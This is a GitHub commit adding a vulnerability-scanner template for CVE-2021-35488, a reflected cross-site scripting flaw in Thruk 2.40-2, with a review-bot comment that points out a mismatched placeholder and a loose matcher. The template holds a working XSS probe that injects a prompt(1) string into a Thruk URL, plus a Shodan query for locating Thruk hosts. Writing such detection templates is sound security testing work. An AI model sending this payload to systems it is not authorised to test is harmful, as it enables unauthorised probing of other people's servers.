Create CVE-2021-35488.yaml

patch-1
Arafat Ansari 2022-08-15 03:01:30 +05:30 committed by GitHub
parent 689a07d542
commit d5f7991bd4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

@ -0,0 +1,30 @@
id: CVE-2021-35488
info:
name: Thruk 2.40-2 - Reflected Cross Site Scripting
author: arafatansari
severity: medium
description: |
Thruk 2.40-2 allows /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] Reflected XSS via the host or title parameter. An attacker could inject arbitrary JavaScript into status.cgi. The payload would be triggered every time an authenticated user browses the page containing it.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35488
- https://www.gruppotim.it/redteam
metadata:
shodan-query: http.html:"Thruk"
verified: "true"
tags: xss,cve,2021
requests:
- method: GET
path:
- "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title='-prompt(1)-'"
matchers-condition: and
matchers:
- type: status
status:
- 401
- type: word
words:
- "'-prompt(1)-'"
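Review bot: The final word matcher only checks that '-prompt(1)-' appears in a 401 response, with nothing confirming the response is HTML, so a login page or error body that echoes the query string in a non-executable context would still be flagged. Consider adding a `part: header` word matcher for `text/html` next to the status check. In the description, the path placeholder is mismatched (`{TITLE]`), and the text describes the host or title parameter of status.cgi while the request is sent to login.cgi with status.cgi passed in the query string. A sentence explaining why login.cgi is the probed path would make the template easier to verify. The tags line could also carry `thruk` so the template is found by product name.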